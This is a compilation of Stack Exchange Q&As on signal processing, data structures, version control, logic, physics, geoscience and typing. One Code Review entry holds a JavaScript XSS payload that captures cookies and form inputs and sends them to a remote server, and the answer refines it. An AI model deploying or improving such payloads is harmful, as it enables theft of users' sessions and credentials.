Question: While I'm studying the wavelet transform, I have these questions in my mind and can't find their answers: I understand that when we take longer time windows and take the Fourier transform we suffer in time resolution, but why do we suffer in frequency resolution if we take a shorter time window? Why are longer time intervals needed for high-frequency signals, and shorter time intervals needed for low-frequency signals? In other words, why do we want good frequency resolution for high frequencies and good time resolution for low frequencies? If I have a signal containing frequencies from 0 Hz to 50 Hz, how can I define the range of low and high frequencies? Answer: I understand that when we take longer time windows and take the Fourier transform we suffer in time resolution, but why do we suffer in frequency resolution if we take a shorter time window? Imagine that your signal is two different sinusoids that are close in frequency and they both start at phase 0. If the time window is short their end phase will be almost identical because their frequencies are close. Thus, they are difficult to distinguish with a short time window. If the time window is long the end phase will be quite different - eventually they will be opposite phases (180 degrees out of phase), and thus very easy to distinguish. That is why longer time windows give better frequency resolution. Why are longer time intervals needed for high-frequency signals, and shorter time intervals needed for low-frequency signals? In other words, why do we want good frequency resolution for high frequencies and good time resolution for low frequencies? You do not need longer time intervals for high frequency signals. You'll need to clarify what you're trying to get at on #2 if you want a better response. If I have a signal containing frequencies from 0 Hz to 50 Hz, how can I define the range of low and high frequencies? Again, I'm not sure what you mean. 
What you define as a "high frequency" or "low frequency" is completely arbitrary. What you will need to do is sample the signal at more than 100 Hz to make sure that the Nyquist frequency is above 50 Hz.
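The phase argument above has a simple quantitative counterpart: a DFT over a window of $T$ seconds has bins $1/T$ Hz apart, so two tones closer than one bin blur together. A rough sketch (the sample rate and tone frequencies are arbitrary):

```python
def can_resolve(f1, f2, fs, duration):
    # An N-point DFT over `duration` seconds has bins fs/N = 1/duration
    # Hz apart; two tones closer than one bin blur together.
    n = int(fs * duration)
    bin_width = fs / n
    return abs(f1 - f2) >= bin_width

fs = 1000.0  # sampling rate, Hz
print(can_resolve(100.0, 102.0, fs, 0.1))  # short window (10 Hz bins): False
print(can_resolve(100.0, 102.0, fs, 1.0))  # long window (1 Hz bins): True
```

This is the same tradeoff the answer describes with phases: a 2 Hz separation only accumulates a distinguishable phase difference once the window is long enough.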
{ "domain": "dsp.stackexchange", "id": 3001, "tags": "signal-analysis, wavelet, time-frequency" }
Clean up if else statement
Question: Background I have some simple logic where I get total_kits. I usually make some function call to get the value for this variable. Then if total_kits is less than some MIN_KITS_THRESHOLD, I want to print some message and do nothing. If the is_delivery_created_earlier_today() function returns true, I also want to print some message and do nothing. If neither of those conditions is violated, I want to call my function launch_pipeline(). I am basically using an if/elif/else, but I am wondering if I can organize my if/else statements to be cleaner. Code total_kits = #Some number if total_kits < MIN_KITS_THRESHOLD: # print some message but don't launch pipeline elif is_delivery_created_earlier_today(): # print some message but don't launch pipeline else: launch_pipeline() Answer: You have launch_pipeline() shown as a function, so I'll assume that you are comfortable with writing functions. Create a boolean function, something like is_pipeline_allowed(), and put your reasons inside that. total_kits = get_number_of_kits() if is_pipeline_allowed(total_kits): launch_pipeline() Elsewhere: def is_pipeline_allowed(nkits): if nkits < MIN_KITS_THRESHOLD: print("not enough kits for pipeline to launch") return False if is_delivery_created_earlier_today(): print("pipeline has already launched for today") return False return True
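If the list of preconditions grows beyond two, another option is to table-drive the checks. This is only a sketch; the threshold value and the stubbed helpers below are made up to mirror the question:

```python
MIN_KITS_THRESHOLD = 5  # assumed value for illustration

def is_delivery_created_earlier_today():
    return False  # stub standing in for the real check

def launch_pipeline():
    print("launching pipeline")  # stub standing in for the real launcher

def maybe_launch(total_kits):
    # Each entry pairs a blocking condition with the message to print.
    blockers = [
        (total_kits < MIN_KITS_THRESHOLD, "not enough kits to launch"),
        (is_delivery_created_earlier_today(), "already launched today"),
    ]
    for blocked, message in blockers:
        if blocked:
            print(message)
            return False
    launch_pipeline()
    return True

print(maybe_launch(10))  # True (pipeline launched)
print(maybe_launch(1))   # False (prints the threshold message)
```

Adding a third precondition later is then a one-line change to the blockers list rather than another elif branch.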
{ "domain": "codereview.stackexchange", "id": 40412, "tags": "python" }
What are the disadvantages of Fibonacci Heaps?
Question: A Fibonacci heap is a data structure for priority queue / heap operations. It seems to have the best complexity for all operations (amortized $O(1)$ insert, merge, and decrease-key, and amortized $O(\log n)$ delete-min). Since it has the best performance, why not use it everywhere? What are its disadvantages? Answer: $O(1)$ merely means that no matter how large your heap grows, the operation will always take roughly the same time to execute. It doesn't mean "the fastest". The Wikipedia article you linked has a section named "Practical considerations": Fibonacci heaps have a reputation for being slow in practice due to large memory consumption per node and high constant factors on all operations. Recent experimental results suggest that Fibonacci heaps are more efficient in practice than most of its later derivatives, including quake heaps, violation heaps, strict Fibonacci heaps, rank pairing heaps, but less efficient than either pairing heaps or array-based heaps.
{ "domain": "cs.stackexchange", "id": 21148, "tags": "algorithms, heaps, priority-queues" }
Is there an online planetarium where the observer is on another celestial body?
Question: I know about in-the-sky.org and its online planetarium feature, but that's from the Earth's perspective. Is there a planetarium (preferably online but if not, that's fine) where the observer is on another celestial body, like the Moon or Mars? Answer: Yes, the free software Stellarium (also Wikipedia) can do that. It has a list of celestial bodies and you select which one you want to be on. When you open Stellarium go to Location Menu (or the button F6 for Windows OS) and that is where you set your viewing point. There might be additional options in Where can I find/visualize planets/stars/moons/etc positions?
{ "domain": "astronomy.stackexchange", "id": 4426, "tags": "software" }
Git, Mercurial, others -- what's the best system for an engineering team new to version control?
Question: I recently started working with a new team doing detailed energy modeling for all flavors of building projects -- commercial, industrial, residential, new construction, renovations, additions. As the team has been growing, we've been discussing three particular problems that I believe version control could help with. Our challenges Coordinating multiple people working on a single energy model. Each building model involves different components -- geometry, envelope, HVAC, lighting, etc. For time-crunched projects different people may work on different components simultaneously. Bringing each person's work together at the end can be complicated and time-consuming. Keeping track of "known good versions" for a particular application. To streamline our work we create templates for various building components. Each template may only be ready to use for certain building types (say, HVAC template #n is working for commercial buildings but not tested for residential). When starting a new model we review release notes to make sure we apply the appropriate template, until our periodic review when we test/update templates for all use-cases. Both the tracking of historic versions and the periodic integration of updates are complicated and time-consuming. Reproducing results from a report sent to a client. During model development we periodically prepare reports for clients. Each report is tied to a version of the model and templates which is archived on our server. This way we can re-open the old model to address any questions the client has, even as model development has continued. At times we also need to change aspects of the old model to answer specific client questions, before a model update is ready. At this point, the task of integrating two separate streams of model changes becomes... complicated and time-consuming. All of these processes can be improved with version control -- but nobody here has ever used version control! 
I'm wondering if others here have been in a similar position, and implemented a version control system. What did you use, and how did it go? What best practices can you share? Some details about our team and our work All engineers use Windows 10 All of our modeling tools are Win32 applications (eQuest, Open Studio, TRNSYS), but modeling source files are stored as text-based files (not binary) We're considering Git, Mercurial, and Bazaar We do not currently have a server where we could run something like SVN, so we'd prefer a distributed system which could store files on a shared drive (such as a networked drive, SharePoint, DropBox, etc). Answer: To close the loop on this, and in case it's helpful for anyone else in the future... Here's the solution we ended up picking, and a few of the reasons and resources that moved us in that direction. Let me preface by saying, as several have pointed out in the comments and answers, that the key to implementing version control is the mindset change and consistency of following a new process. We had a process that emulated what we do now, but it was complicated, time consuming, and prone to errors. Here's what we ended up doing. git While looking into SVN I found a helpful article, but even more helpful was this comment on the article: "5 reasons, coming from someone who has moved from subversion to git twice voluntarily". The ability to seamlessly work off-line or outside of our internal network were big selling points. A comment I came across a few times (see this answer on softwareengineering.se, for example) is that merging in SVN is complicated, and for those less comfortable with SVN can lead to a reluctance to commit. This defeats the purpose. In contrast, I found this article from Atlassian explaining that in git, "commits are cheap." Version control is most useful when frequent commits are made, so I wanted to lower the bar as much as possible for the team. 
Because I knew I needed to get a certain level of buy-in before devoting significant resources to the project, setting up a server (such as would be needed for SVN) was off the table. I don't have the skills to do this, and convincing our small team to put time/money into something that they aren't convinced they need (when there are other things we all agree we need but that we can't afford yet) was a non-starter. Of course, this is a Catch-22: If we had a server with SVN set up, we likely could have gotten a satisfactory SVN process going. I set up TortoiseSVN on my PC and used it for a couple of weeks. It was functional, but not exceptional. Once I decided to move away from SVN to a DVCS (distributed version control system), the choice between Mercurial and git was decided by the fact that I had used git in the past.

GitLab

Free and open source. We did consider GitHub, but it is limited to three collaborators on private repos. Bitbucket is limited to five users for free teams. As we (and our resources) grow, we may revisit hosting. This part of the process would be relatively easy to change.

Sourcetree

Based on comments on a forum for energy modeling (which is our use case), I decided to give Sourcetree a try. I found the interface helpful and intuitive.

Some other helpful resources:

Oliver Steele's "My git workflow". The graphics were particularly useful for explaining git to our team.
"Version control for energy models". Helped us think through developing/implementing a workflow for our particular application.
{ "domain": "engineering.stackexchange", "id": 2596, "tags": "modeling, tools" }
Finding a finite model
Question: I know that the question "does a first-order formula $\phi$ have a model" is undecidable in general. Could anyone give me a link or a book which gives the answer for finite models? If I have a first-order formula $\phi$, is it decidable whether $\phi$ has a finite model? I am pretty sure that the question is well known, but I do not even know where to begin the search for an answer. (For example, I would have expected it to be in Libkin's "Elements of Finite Model Theory", but it seems that I cannot find it.) The second part of my question is: Are there known restrictions such that the problem is decidable? For example, the problem may become decidable for first-order formulas with only monadic predicates. Or when we have monadic predicates plus a successor relation. But I cannot imagine an algorithm to decide if there exists a (finite) model under those restrictions. Answer: The first part of your question is answered by Trakhtenbrot's Theorem. The second part is quite a large question indeed. Depending on the relational structure you're working on, multiple solutions can be given. For instance, if you're interested in formal languages, MSO over word structures corresponds to regular languages, and the matching logic (see this) corresponds to CFLs, and thus both have decidable satisfiability problems. You should have a look at Chapter 14 of Libkin, where nice fragments of FO are proven to have a decidable satisfiability problem, according to the number of quantifier alternations allowed.
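Although Trakhtenbrot's theorem rules out a full decision procedure, finite satisfiability is still semi-decidable: enumerate finite structures in order of size and model-check each one. A minimal pure-Python sketch of that enumeration, for a toy signature with a single binary relation (the formula is represented as an ordinary Python predicate; all names here are illustrative, not from any standard library):

```python
from itertools import product

def finite_models(phi, max_size):
    """Enumerate finite structures with one binary relation R over
    domains {0..n-1}, n = 1..max_size, yielding those satisfying phi.
    phi is a predicate phi(domain, R) with R a set of pairs.
    This is a semi-decision procedure: it finds a finite model if one
    exists within max_size, but in general cannot certify that no
    finite model exists (Trakhtenbrot's theorem)."""
    for n in range(1, max_size + 1):
        dom = range(n)
        pairs = list(product(dom, repeat=2))
        # every subset of dom x dom is a candidate interpretation of R
        for bits in product([0, 1], repeat=len(pairs)):
            R = {p for p, b in zip(pairs, bits) if b}
            if phi(dom, R):
                yield n, R

# Example sentence: "R is a strict total order"
# (irreflexive, transitive, total) -- satisfiable at every finite size.
def strict_total_order(dom, R):
    irref = all((x, x) not in R for x in dom)
    trans = all((x, z) in R
                for x in dom for y in dom for z in dom
                if (x, y) in R and (y, z) in R)
    total = all((x, y) in R or (y, x) in R
                for x in dom for y in dom if x != y)
    return irref and trans and total

n, R = next(finite_models(strict_total_order, 3))
```

The search halts as soon as some finite model is found, but if $\phi$ has no finite model the loop over ever-larger sizes never terminates, which is exactly the asymmetry the theorem describes.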
{ "domain": "cstheory.stackexchange", "id": 3738, "tags": "reference-request, lo.logic, computability, finite-model-theory" }
Quantum states after real world measurements
Question: Regarding measurements of an observable in a quantum system. My understanding, from the postulates of quantum mechanics, is that when we measure an observable quantity, the state of the system collapses to an eigenfunction $|y \rangle$ of the linear Hermitian operator which corresponds to the observable: $$\hat{A}|y \rangle = y|y \rangle$$ where $y$ is the eigenvalue and $|y \rangle$ is the eigenstate. Then if we project the collapsed state onto the basis of the observable we get the Dirac delta function. Let's consider the position operator for example; then: $$\langle x| \hat{A}|y \rangle = y \langle x| y \rangle = y \delta(x-y).$$ From what I understand, in real-world measurements the state of the system is not exactly a Dirac delta function but rather some wave packet. What is the nature of this wave packet, and what determines its shape and the corresponding function? Why can't the function be a Dirac delta function in real-world measurements? Thanks. Answer: A Dirac delta function has a vanishing width. To "collapse" the wavefunction to a delta function, one's measuring apparatus would need to have infinite precision, i.e. zero uncertainty. Since no measuring apparatus is perfect, no measurement can force the wavefunction to have zero uncertainty, i.e. zero width. Therefore, measurement will collapse the wavefunction to a width related in some way to the uncertainty of the measuring apparatus. The shape of the wavefunction following measurement depends on the nature of the measurement act. This would be impossible to model without knowledge about the measuring apparatus.
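The finite-width point can be illustrated numerically: a normalized Gaussian packet of width $\sigma$ keeps unit norm while its position variance is $\sigma^2$ and its peak grows like $1/\sigma$, approaching a delta function only in the unattainable $\sigma \to 0$ limit. A small pure-Python sketch (the grid spacing and the $\sigma$ values are arbitrary illustrative choices):

```python
import math

def gaussian_density(x, sigma):
    # |psi(x)|^2 for a Gaussian wave packet centred at 0 with width sigma
    return math.exp(-x * x / (2 * sigma ** 2)) / (sigma * math.sqrt(2 * math.pi))

def moments(sigma, half_width=10.0, dx=1e-3):
    # crude numerical integration of the norm and position variance
    xs = [i * dx for i in range(int(-half_width / dx), int(half_width / dx) + 1)]
    norm = sum(gaussian_density(x, sigma) for x in xs) * dx
    var = sum(x * x * gaussian_density(x, sigma) for x in xs) * dx
    return norm, var

for sigma in (1.0, 0.5, 0.1):
    norm, var = moments(sigma)
    # norm stays ~1 for every sigma, while var ~ sigma^2 shrinks with
    # the resolution of the (imperfect) measuring apparatus; the peak
    # gaussian_density(0, sigma) = 1/(sigma*sqrt(2*pi)) grows without
    # bound only in the idealized delta-function limit sigma -> 0.
```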
{ "domain": "physics.stackexchange", "id": 32672, "tags": "quantum-mechanics, wavefunction, measurement-problem, observables" }
JavaScript Payload
Question: I am coding a proof of concept on the dangers of JavaScript poisoning, XSS and other client-side attacks. Therefore, I coded some JavaScript payloads. As I am not very familiar with JavaScript (I actually hate this language), I would really appreciate it if you could give me some recommendations to improve the code (logic, syntax, efficiency, more explicit names for the functions). For example, I am aware that I am not making good use of the callback (I am calling getIP twice when I could call it once and store the IP somewhere, but I haven't managed to find out how to do that), and my ajaxRequest method is very similar to my getIP method. My only requirement is to use pure JavaScript.

function ajaxRequest(data) {
    var xhttp = new XMLHttpRequest();
    var url = "http://something/payload.php?" + data;
    xhttp.open("GET", url, true);
    xhttp.send();
}

function getIP(callback) {
    var xhttp = new XMLHttpRequest();
    var url = "http://something/payload.php?action=getIp";
    xhttp.onreadystatechange = function() {
        if (xhttp.readyState == 4 && xhttp.status == 200) {
            var jsonObj = JSON.parse(xhttp.responseText);
            callback(jsonObj.ip);
        }
    };
    xhttp.open("GET", url, true);
    xhttp.send();
}

function grabDomain(victimIp) {
    var data = "action=grabDomain&victimIp="+victimIp+"&domain="+document.domain+"&location="+location.pathname+"&cookie="+document.cookie;
    console.log(data);
    ajaxRequest(data);
}

function addFormsKeyLogger(victimIp) {
    var forms = document.getElementsByTagName("form");
    for (var i = 0; i < forms.length; i++) {
        addFormKeyLogger(victimIp, forms[i]);
    }
}

function addFormKeyLogger(victimIp, form) {
    form.addEventListener("submit", function() {
        var elements = form.elements;
        var formData = "";
        for (var j = 0; j < elements.length; j++) {
            formData += elements[j].name + "=" + elements[j].value + "|";
        }
        if (formData) {
            sendForm(victimIp, formData);
        }
    }, false);
}

function sendForm(victimIp, formData) {
    var data = "action=grabForm&victimIp="+victimIp+"&domain="+document.domain+"&location="+location.pathname+"&data="+formData;
    console.log(data);
    ajaxRequest(data);
}

function run() {
    // We steal the cookies - improvement: steal http-only cookies
    getIP(grabDomain);
    // We steal the data sent through the forms
    getIP(addFormsKeyLogger);
}

run();

Answer: document.getElementsByTagName("form") may be shortened to document.forms. Inside the event listener function inside addFormKeyLogger(), replace form with this. The event target is assigned to the special value this inside event listeners. This also means that you only need a single instance of the event handler function for each victimIp, since the reference to form is now unnecessary. You can reuse the callback parameter of getIP() by wrapping the two callbacks inside another callback function:

getIP(function(victimIp) {
    grabDomain(victimIp);
    addFormsKeyLogger(victimIp);
});

Encode your URI parameters! Then you don't need to resort to separating them with non-standard characters (| instead of &) for multiple levels of nesting.

var data = "action=grabDomain" +
    "&victimIp=" + encodeURIComponent(victimIp) +
    "&domain=" + encodeURIComponent(document.domain) +
    "&location=" + encodeURIComponent(location.pathname) +
    "&cookie=" + encodeURIComponent(document.cookie);

formData += encodeURIComponent(elements[j].name) + "=" + encodeURIComponent(elements[j].value) + "&";

var data = "action=grabForm" +
    "&victimIp=" + encodeURIComponent(victimIp) +
    "&domain=" + encodeURIComponent(document.domain) +
    "&location=" + encodeURIComponent(location.pathname) +
    "&data=" + encodeURIComponent(formData);

Encoding may not be necessary for victimIp and document.domain, since they're only supposed to contain "safe" characters according to the encoding function anyway. If this code seems repetitive to you, I agree with you. Pass dictionary objects with the parameters to a function that builds these parameter strings.
Example:

function buildParamString(dict) {
    var s = "";
    for (var key in dict) {
        s += s ? "&" : "?";
        s += encodeURIComponent(key);
        var value = dict[key];
        if (typeof(value) !== "undefined" && value !== null)
            s += "=" + encodeURIComponent(value.toString());
    }
    return s;
}

var params = {
    action: "grabDomain",
    victimIp: victimIp,
    domain: document.domain,
    location: location.pathname,
    cookie: document.cookie
};
var url = "http://www.example.com/" + buildParamString(params);

Wrap the whole thing inside an anonymous function to avoid namespace pollution:

(function() {
    function ajaxRequest(data) {
        [...]
    }
    run();
})();

For more information on this topic see What is the purpose of wrapping whole Javascript files in anonymous functions like “(function(){ … })()”?
{ "domain": "codereview.stackexchange", "id": 18557, "tags": "javascript, ajax" }
Are mantle plumes distributed around the core randomly or in a known pattern?
Question: Background: The theory of mantle plumes is useful (although controversial) in explaining the occurrence of intra-plate volcanoes. The website here suggests that "hotspots" exist in fixed locations relative to one another in the core, and thus on a planet like Mars, where there are no tectonic plates, massive volcanoes will form above these "hotspots", but on Earth moving tectonic plates give rise to strings of volcanoes above underlying "hotspots". The quote below is from the linked website: The image on the right shows some of the other "hot spots" scattered about the floor of the Pacific Ocean. It is intriguing that portions of island chains of similar age are parallel to each other. This suggests that the "hot spots" themselves remain mostly fixed with respect to each other; otherwise the chains might be expected to be curvilinear, or trend in different directions as the "hot spots" generating them moved independently. Question: Assuming that mantle plumes remain in fixed locations relative to one another at the core, is there any known pattern for how these mantle plumes are distributed relative to one another (or to fixed landmarks, e.g. the axis of rotation), or do they appear to be distributed randomly? Answer: First of all, the idea of a fixed "hotspot" reference frame is (albeit reluctantly) falling out of favour on a geological timescale; see e.g. http://onlinelibrary.wiley.com/doi/10.1029/GM121p0339/summary ("As studies of plate motions have advanced, however, it has become clear that the global hotspots do not stay fixed relative to each other...") and http://adsabs.harvard.edu/abs/2010AGUFM.U51A0010S ("Hotspot reference frames can only be confidently tied back to about 130 Ma and there is evidence that mantle plumes have moved relative to each other.") Global Moving Hotspot Reference Frames are in the process of being built, see e.g.
http://adsabs.harvard.edu/abs/2010AGUFMGP24A..03D Secondly, identifiable patterns in the distribution of mantle plumes are an area of active research: this year's EGU medal for outstanding young scientist was awarded to Rhodri Davies for his work in this area. Key to most arguments is the presence of Large Low Shear Velocity Provinces (LLSVPs) in the lower mantle, historically assumed to be "slab graveyards" (thermochemical piles created when subducting slabs pool in the lower mantle). The suggestion that these areas were both chemically and thermally distinct from surrounding mantle focussed attention on their margins as a highly probable location for the formation of mantle plumes. However, recent findings (by, and cited extensively by, Rhodri Davies) increasingly support the idea that these piles are thermal features only, with no chemical difference to surrounding mantle. Rhodri Davies' research revisits past studies that found hotspots were concentrated along the edges of LLSVPs, and has thoroughly demonstrated that these conclusions are not robust, e.g. to the choice of hotspot catalogue, the prescribed angular search tolerance (between surface expression and imaged margin), the (arbitrary) depth of analysis, and the (arbitrary) shear-wave velocity contour. Via Monte Carlo simulations he rules out hotspots being drawn from the margins of the Pacific LLSVP, but cannot rule out the possibility that hotspots are preferentially drawn from the entire areal extent of LLSVPs in both the Pacific and the Atlantic. RD & his team conclude that present-day hotspot locations are controlled by ancient subduction, rather than the current margins of LLSVPs - which are demonstrated via dynamical simulations to be mobile, even in the presence of dense chemical heterogeneity. (As a side note, both "hotspots" and "mantle plume" are contested terminology, it's true - but the vast majority of geoscientists believe that mantle plumes do exist.
There is complexity to that view, in that the consensus does not require all intraplate volcanism to be the result of atypically hot mantle -- but the idea that mantle plumes simply do not exist, as espoused by mantleplumes.org, does not have wide acceptance.)
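The kind of Monte Carlo robustness test described above (do observed hotspots sit closer to a margin than chance allows?) can be sketched in a few lines. Everything below is synthetic and illustrative: the margin, the "hotspot" coordinates, and the distance statistic are stand-ins, not the actual catalogues or LLSVP contours used in the cited research.

```python
import random

def mean_min_distance(points, margin):
    """Mean distance from each point to its nearest margin vertex."""
    def d(p, q):
        return ((p[0] - q[0]) ** 2 + (p[1] - q[1]) ** 2) ** 0.5
    return sum(min(d(p, m) for m in margin) for p in points) / len(points)

def monte_carlo_p_value(observed, margin, trials=2000, seed=0):
    """Fraction of random catalogues (uniform on the unit square) whose
    mean margin distance is <= the observed one. A small p-value
    suggests the observed points cluster near the margin more than
    chance alone would produce."""
    rng = random.Random(seed)
    obs = mean_min_distance(observed, margin)
    hits = 0
    for _ in range(trials):
        fake = [(rng.random(), rng.random()) for _ in observed]
        if mean_min_distance(fake, margin) <= obs:
            hits += 1
    return hits / trials

# Synthetic margin: vertices along the line x = 0.5
margin = [(0.5, y / 10) for y in range(11)]
# Synthetic "hotspots" deliberately placed near that margin
observed = [(0.5 + 0.02 * i, 0.1 * i) for i in range(8)]
p = monte_carlo_p_value(observed, margin)
```

With the deliberately margin-hugging points above, the p-value comes out very small; the published analyses show how sensitive such conclusions are to the choices hidden in `margin` and the distance tolerance.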
{ "domain": "earthscience.stackexchange", "id": 71, "tags": "plate-tectonics, volcanoes, mantle, convection, mantle-plumes" }
How can Clostridium tetani proliferate in relatively minor wounds?
Question: It is often reported (NIH) that some of the most common infections by Clostridium tetani are in minor wounds where, in theory, blood (hence oxygen) supply should not be completely disrupted. How can this obligate anaerobic bacillus proliferate in such conditions? Are concomitant necrotizing infections (such as, for example, Staphylococcus aureus) to blame? Answer: Non-disruption of blood supply seems to be a heuristic/rule of thumb/approximation of the survival of oxygen supply to tissue in and around a "minor" wound. What I mean is, it's not a 100% confirmation of persistent oxygenation, especially if we consider every relevant locus at the wound site. Remember we're talking of microbes here, and at that scale anaerobic pockets can exist even in the presence of macroscopically visible redness/bleeding/oozing (signs of good circulation), and that's all Clostridium tetani needs to proliferate, synthesize and release its deadly toxin.
{ "domain": "biology.stackexchange", "id": 12427, "tags": "bacteriology, medicine" }
Is it possible to build any regular expression in a computer language with just 3 basic operators?
Question: Many computer languages have complex regular expression tools. For example, in JavaScript you have global flags, escape characters, whitespace characters, assertions, character classes, groups and ranges, etc. I'm wondering whether using just the three basic regular expression operators as defined in formal languages (concatenation, alternation and Kleene star) can achieve the same result as any pattern described with more tools, as for example in JavaScript. Is there a theorem about this? Answer: Regular expressions using only concatenation, alternation and Kleene star describe regular languages. In contrast, extended regular expressions available in modern programming languages can describe non-regular languages. For example, (.*)\1 describes the language $\{ ww : w \in \Sigma^* \}$, which is not even context-free.
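The backreference claim is easy to check directly in Python, whose re module supports \1 (an extension beyond the three classical operators):

```python
import re

# (.*)\1 matches exactly the strings of the form ww. The backreference
# \1 must repeat whatever the group captured, which no classical
# regular expression (concatenation, alternation, star) can express:
# over an alphabet with >= 2 symbols the language is not even
# context-free.
pattern = re.compile(r"(.*)\1")

def is_square(s):
    return pattern.fullmatch(s) is not None

examples = {
    "": True,        # w = empty string
    "aa": True,      # w = "a"
    "abab": True,    # w = "ab"
    "aba": False,    # odd length, cannot be ww
    "abc": False,
}
```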
{ "domain": "cs.stackexchange", "id": 18856, "tags": "regular-languages, regular-expressions" }
Detection of charged particle in optical fiber cable
Question: There is a charged particle source and a light source attached to an optical fiber cable which is attached to a light detector. Is it possible to detect the passage of a charged particle through the cable due to a change in the light (from the light source) that is received by the light detector? If yes, how does the detection/signal depend on particle energy and light wavelength? A Google search gave me papers related to light induced in optical fiber by a charged particle, e.g. https://iopscience.iop.org/article/10.1088/1742-6596/732/1/012005/pdf. Also, I tried looking here on Stack but could not find anything similar. Thank you. Answer: In general, charged particles going through a transparent medium with velocity higher than the velocity of light in the medium generate Cerenkov radiation, which is the method used to detect neutrinos: neutrino interactions in many large-scale experiments give rise to fast charged particles. Now a fiber is transparent to light, and if a fast electron goes through there will be radiation, but if there is light already going through the fiber there will be superposition and a need to unravel the signal from the steady state. The paper you quote is not talking of Cerenkov light, but of an effect due to the dipoles' interaction with the charged particle, for very thin fibers. It sounds interesting and it seems to be designed for accelerator beam control. Try the CERN document server to see whether this research is pursued.
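The Cerenkov condition (particle speed above $c/n$) fixes an energy threshold for each particle and medium, which partly answers the "how does it depend on particle energy" part of the question. A sketch computing the threshold kinetic energy for an electron in a fused-silica fibre; the refractive index 1.46 is an illustrative round value:

```python
import math

def cherenkov_threshold_kinetic_energy(n, rest_energy_mev):
    """Minimum kinetic energy (MeV) for Cherenkov emission in a medium
    of refractive index n: the particle needs beta = v/c > 1/n."""
    beta = 1.0 / n
    gamma = 1.0 / math.sqrt(1.0 - beta * beta)
    return (gamma - 1.0) * rest_energy_mev

# electron rest energy ~0.511 MeV; fused silica n ~1.46
ke = cherenkov_threshold_kinetic_energy(1.46, 0.511)
# comes out near 0.19 MeV: electrons below this kinetic energy emit no
# Cherenkov light in the fibre, however sensitive the detector.
```

The threshold rises as the refractive index drops (e.g. it is higher in water, n about 1.33), and it scales with the particle's rest energy, so muons or protons need far more kinetic energy than electrons.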
{ "domain": "physics.stackexchange", "id": 67054, "tags": "particle-physics, photons, experimental-physics, particle-detectors, optical-materials" }
Confusion about data types, compilers, hardware data representation and static vs dynamic typing
Question: I am trying to understand static vs dynamic typing, but am really struggling to see how everything fits together. It all starts with data types. As far as I understand, data types are quite abstract notions, which exist 'in' compilers in order to categorise data so that the operations on various types of data can be validated (i.e. in an attempt to stop you adding a string to an integer), and in order to generate the right machine code for the hardware interpretation of the value. I.e. say we have the following: int myInt = 5; char myChar = '5'; Console.WriteLine(myInt); Console.WriteLine(myChar); Both would ultimately write a five to the console window, but, since the representations in memory of integers and characters are different, the machine code which interprets the value in the memory location bound to the variable myInt, which takes that value and displays it on the console window, would be different to the machine code for myChar. Even though Console.WriteLine() 'does the same job', the different representations of five require different low level code. So my question is this: if data types 'exist only in the compiler' - i.e. once the program has been compiled into machine code there is no knowledge of what type of data the value in a particular memory cell is (everything is just 1s and 0s) - then how can any type-checking be done at runtime? Surely there is no concept of data types at run time? So surely dynamic typing can't be anything to do with type-checking occurring at run time? Where is my understanding going wrong, and could somebody please explain static and dynamic typing with respect to the argument given above? What is the big picture of what is going on? I am trying to understand this for an essay, so references to books or online sources would be useful :) Thank you. Answer: First, you must be aware that computer science is full of terms which have multiple, related but conflicting definitions. 
The fact that two authors use the same term such as "type" does not mean they use the same definition, and thus there may be inconsistencies if you are not careful when you try to combine different sources. A type is a property attached to entities (values, variables, ...) which allows us to know what operations are allowed on those things and what the result of those operations is (including the type of the result). That means that the type determines the interpretation of the bit pattern representing a value, but that's not the only effect of types. It is common to introduce several types which give the same meaning to bit patterns, just to prevent their use in some contexts (an extreme example would be to have different types for X and Y coordinates to be sure they are not swapped at the wrong time). A language may be:

statically typed: an analysis of the program allows us to know the type of an entity without the need to execute it (that is what you were thinking about). That is common for languages which are compiled.

dynamically typed: values carry information about their type. Choices which need that information must be made at execution time, looking at the information attached to the value at hand. That is common for languages which are interpreted.

untyped: operations assume that their arguments are correct (note that this is different from implicit conversions; implicit conversions try to preserve a notion of value, while in an untyped language that does not happen). There are no typing errors (but an argument may be invalid and trigger an error) and no choice of behavior depending on types. Nowadays the most common untyped languages are the assembly languages. Historically, languages like BLISS and BCPL were also in that class. The original TCL language was also in that class.

Note that it is quite common for languages to have aspects of several kinds.
C++, for instance, has a notion of static type which determines some things such as overload resolution, a notion of dynamic type which determines other things such as virtual function dispatch, and reinterpret_cast, which allows one to circumvent the typing system and behave in an untyped way. A language may be defined in a dynamic way, as if the values carried the type information, but a compiler may analyze a program, remove part of the checks that would be needed, and even remove the need to attach dynamic type information to some values. And a language may have types (static or dynamic) but be used in an untyped way (Lisp variants often have a notion of dynamic type, but lists are also often used to represent everything not built-in). "So my question is this: if data types 'exist only in the compiler'..." I've tried to show that this assumption is false. It may be true for some languages, but others attach type information to values (and that's the case for object-oriented ones -- I've in the past described OO as a way to get the benefits of dynamic typing without completely dropping the benefits of static typing; if there is dynamic dispatch based on type, you need to have dynamic type information). Note that the information may be part of the value as a tag, as a pointer to a type-describing data structure (the vptr of common implementations of C++), or even implicit (that area of memory is used only to store values of that type; the bits don't have to show what type the value is, because the place where they are stored gives the information).

References:
Types and Programming Languages by B. Pierce (but IIRC it is strongly oriented towards static typing)
Concepts, Techniques, and Models of Computer Programming by P. van Roy and Seif Haridi, wider in scope but more oriented towards dynamic typing; it may also be useful for organizing things before a reference such as B. Pierce, which is concerned with just typing issues.
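The "information attached to the value" idea can be made concrete with a toy dynamic runtime: every value is a (tag, payload) pair and every operation inspects the tag before acting, which is what a dynamically typed interpreter does implicitly for you. A minimal sketch (names and tags are illustrative, not any real runtime's representation):

```python
# A toy dynamic runtime: values carry an explicit type tag, and the
# "add" operation dispatches on the tags at execution time.

def make(tag, payload):
    return (tag, payload)

def add(a, b):
    ta, va = a
    tb, vb = b
    if ta == tb == "int":
        return make("int", va + vb)
    if ta == tb == "str":
        return make("str", va + vb)
    # the dynamic analogue of a static type error caught by a compiler
    raise TypeError("cannot add " + ta + " and " + tb)

x = add(make("int", 2), make("int", 3))      # yields ("int", 5)
s = add(make("str", "5"), make("str", "!"))  # yields ("str", "5!")
# add(make("int", 2), make("str", "5")) raises TypeError at run time.
```

A static type checker, by contrast, would reject the mixed call before the program ever runs, and an untyped language would simply apply the machine-level addition to whatever bits it was given.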
{ "domain": "cs.stackexchange", "id": 5637, "tags": "compilers, type-checking, typing" }
Charging an object by induction
